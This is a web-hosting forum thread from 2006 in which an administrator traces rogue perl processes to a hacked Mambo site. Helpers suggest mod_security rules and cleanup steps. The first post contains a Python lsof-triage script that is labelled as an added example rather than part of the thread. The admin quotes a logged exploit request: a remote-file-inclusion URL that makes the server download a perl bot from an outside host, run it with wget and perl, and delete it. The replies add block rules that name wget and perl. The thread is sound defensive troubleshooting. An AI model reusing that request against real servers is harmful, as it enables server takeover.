
can not trace process - httpsl

Discussion in 'General Discussion' started by sint19, Aug 7, 2006.

  1. sint19

    sint19 Member

    Joined:
    Feb 16, 2003
    Messages:
    6
    Likes Received:
    0
    Trophy Points:
    151
    I have a lot of httpsl processes, about 50 at the same time.
    Example of one of them:
    [/proc/28899]# ls -al
    total 0
    dr-xr-xr-x 3 nobody nobody 0 Aug 7 19:04 ./
    dr-xr-xr-x 1522 root root 0 Aug 6 00:31 ../
    -r--r--r-- 1 nobody nobody 0 Aug 7 19:05 cmdline
    -r--r--r-- 1 nobody nobody 0 Aug 7 19:05 cpu
    lrwxrwxrwx 1 nobody nobody 0 Aug 7 19:05 cwd -> //
    -r-------- 1 nobody nobody 0 Aug 7 19:05 environ
    lrwxrwxrwx 1 nobody nobody 0 Aug 7 19:05 exe -> /usr/bin/perl*
    dr-x------ 2 nobody nobody 0 Aug 7 19:05 fd/
    -r--r--r-- 1 nobody nobody 0 Aug 7 19:05 maps
    -rw------- 1 nobody nobody 0 Aug 7 19:05 mem
    -r--r--r-- 1 nobody nobody 0 Aug 7 19:05 mounts
    lrwxrwxrwx 1 nobody nobody 0 Aug 7 19:05 root -> //
    -r--r--r-- 1 nobody nobody 0 Aug 7 19:05 stat
    -r--r--r-- 1 nobody nobody 0 Aug 7 19:05 statm
    -r--r--r-- 1 nobody nobody 0 Aug 7 19:05 status



    lsof -p 28899
    COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
    perl 28899 nobody cwd DIR 130,46 1024 456187906 /
    perl 28899 nobody rtd DIR 130,46 1024 456187906 /
    perl 28899 nobody txt REG 130,46 942729 509666453 /usr/bin/perl
    perl 28899 nobody 0r CHR 1,3 457965571 /dev/null
    perl 28899 nobody 1w FIFO 130,5 977102708 pipe
    perl 28899 nobody 2w REG 130,46 3331669 689897475 /usr/local/apache/logs/error_log
    perl 28899 nobody 3u IPv4 977413800 TCP my.server.com:34124->rm43.1blu.de:8209 (ESTABLISHED)
    perl 28899 nobody 4u unix 0xa22b77e0 977102504 socket
    perl 28899 nobody 5u unix 0x248a2760 976881059 socket
    perl 28899 nobody 15w REG 130,46 0 689897478 /usr/local/apache/logs/audit_log
    perl 28899 nobody 16w REG 130,46 0 689897485 /usr/local/apache/logs/modsec_debug_log
    perl 28899 nobody 17w REG 130,46 3331669 689897475 /usr/local/apache/logs/error_log
    ... a lot of domlogs



    For CWD (current working folder) I have only '/'.
    cat environ: there is nothing.
    Any idea how to stop this? (Blocking the rm43.1blu.de IP will not solve the problem.)

    thanks
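An added example (not code from the thread or from cPanel) showing how the clues in the listing above can be checked mechanically: a small Python triage script that parses `lsof` output in the format quoted in the post and flags the traits that made this process stand out. The sample output is constructed to mirror the post, with the remote host replaced by a placeholder and an ordinary httpd worker added for contrast, so it runs offline.

```python
"""Triage of lsof output for processes running as the web-server user.

Added example, not from the original thread.  Parses `lsof` output in the
format quoted in the first post and flags the traits the thread relied on:
the program image is a script interpreter rather than the web server
binary, the working directory is '/', and the process holds an established
outbound TCP connection to a non-web port.
"""
import re

INTERPRETERS = {"perl", "python", "php", "sh", "bash", "ruby"}
WEB_PORTS = {80, 443}

# Constructed sample in the shape of `lsof -u nobody`: one perl process
# resembling the one in the post (remote host is a placeholder) plus a
# normal httpd worker for contrast.
SAMPLE_LSOF = """\
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
httpd 1234 nobody cwd DIR 130,46 1024 456187906 /
httpd 1234 nobody txt REG 130,46 1203456 509666001 /usr/local/apache/bin/httpd
httpd 1234 nobody 3u IPv4 977400001 TCP *:80 (LISTEN)
perl 28899 nobody cwd DIR 130,46 1024 456187906 /
perl 28899 nobody rtd DIR 130,46 1024 456187906 /
perl 28899 nobody txt REG 130,46 942729 509666453 /usr/bin/perl
perl 28899 nobody 0r CHR 1,3 457965571 /dev/null
perl 28899 nobody 1w FIFO 130,5 977102708 pipe
perl 28899 nobody 2w REG 130,46 3331669 689897475 /usr/local/apache/logs/error_log
perl 28899 nobody 3u IPv4 977413800 TCP my.server.com:34124->remote.example.net:8209 (ESTABLISHED)
perl 28899 nobody 4u unix 0xa22b77e0 977102504 socket
"""

# NAME column of an lsof TCP line: local:port->remote:port (STATE)
TCP_RE = re.compile(r"TCP (\S+?):(\d+)->(\S+?):(\d+) \((\w+)\)")


def parse_lsof(text):
    """Group lsof lines by PID, keeping only the fields the triage needs."""
    procs = {}
    for line in text.splitlines()[1:]:  # first line is the column header
        tokens = line.split()
        if len(tokens) < 5:
            continue
        cmd, pid, user, fd, ftype = tokens[:5]
        proc = procs.setdefault(pid, {
            "command": cmd, "user": user, "cwd": None, "exe": None,
            "connections": [],
        })
        if fd == "cwd":
            proc["cwd"] = tokens[-1]
        elif fd == "txt" and proc["exe"] is None:
            # The first txt entry is the program image itself.
            proc["exe"] = tokens[-1]
        elif ftype in ("IPv4", "IPv6"):
            match = TCP_RE.search(line)
            if match:  # listening sockets have no "->" and are skipped
                proc["connections"].append({
                    "remote": match.group(3),
                    "rport": int(match.group(4)),
                    "state": match.group(5),
                })
    return procs


def indicators(proc):
    """List the suspicious traits of one process; an empty list means none."""
    found = []
    exe_name = (proc["exe"] or "").rsplit("/", 1)[-1]
    if exe_name in INTERPRETERS:
        found.append("interpreter")
    if proc["cwd"] == "/":
        found.append("cwd-root")
    if any(c["state"] == "ESTABLISHED" and c["rport"] not in WEB_PORTS
           for c in proc["connections"]):
        found.append("outbound-nonweb")
    return found


def is_suspicious(proc):
    """Interpreter plus at least one other trait.  A cwd of '/' on its own
    is normal for daemons such as httpd, so it never triggers by itself."""
    found = indicators(proc)
    return "interpreter" in found and len(found) >= 2


if __name__ == "__main__":
    for pid, proc in parse_lsof(SAMPLE_LSOF).items():
        flag = "SUSPICIOUS" if is_suspicious(proc) else "ok"
        print(f"{pid:>6} {proc['command']:<6} {flag:<10} {','.join(indicators(proc))}")
```

On a live box the same parser can be fed `lsof -u nobody -n -P` output; the point of the two-trait rule is that a working directory of `/` alone is not evidence of anything, while an interpreter running as the web user with an outbound session to a high port is what turned out to be the bot here.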
     
  2. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,460
    Likes Received:
    21
    Trophy Points:
    463
    Location:
    Go on, have a guess
    Looks like a perl script being run through a compromised PHP script. You're going to have to wade through your domlogs to track it down.
     
  3. sint19

    sint19 Member

    Joined:
    Feb 16, 2003
    Messages:
    6
    Likes Received:
    0
    Trophy Points:
    151
    Bingo

    Thank you, I found it, but I still don't know the best way to stop this.

    203.113.132.116 - - [08/Aug/2006:01:56:47 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mischel.cz/webdesign/images/CISLA/tool.gif?&cmd=cd%20/tmp/;wget%20http://www.mischel.cz/webdesign/images/CISla/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 200 24007 "-" "Mozilla/5.0"

    The exploit uses Mambo's ''mosConfig_absolute_path''.
    The exploit copies the mambo.txt perl script to /tmp, executes it, and deletes it.
     
  4. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    164
    Likes Received:
    0
    Trophy Points:
    166
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    Install mod_security through WHM -> Addon Scripts, then add rules to /usr/local/apache/conf/modsec.user.conf, such as:

    SecFilter "mosConfig_absolute_path"
    SecFilter "wget"
    SecFilter "com_content"
    SecFilter "perl\x20"

    Those will easily block the widely spread exploit / worm.
     
  5. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    164
    Likes Received:
    0
    Trophy Points:
    166
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    Also run killall -9 perl;killall -9 httpd;httpd stop;httpd startssl

    That will clear any old processes or running exploits, and restart apache fresh after you've installed mod security and applied the necessary paths.



    In the meantime, chmod 700 /usr/bin/wget

    ASAP to avoid further exploitation.
     
  6. sint19

    sint19 Member

    Joined:
    Feb 16, 2003
    Messages:
    6
    Likes Received:
    0
    Trophy Points:
    151
    All done

    except
    SecFilter "com_content"

    it is needed for running mambo, but

    SecFilter "mosConfig_absolute_path"
    SecFilter "wget"

    do a great job (HTTP Error 406 - Not Acceptable).

    Thank you
     
  7. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    164
    Likes Received:
    0
    Trophy Points:
    166
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    I would also suggest SecFilter "perl\x20"

    As that is "perl " and will be used in almost any exploit to run any file. It's better to be safe.

    Also you can use my version at http://www.hostmerit.com/modsec.user.conf

    It's highly recommended by many users of the cPanel forums, as I code it myself and update it A LOT; it was also recommended directly by cPanel in a presentation on security at HostingCon. :p :p
     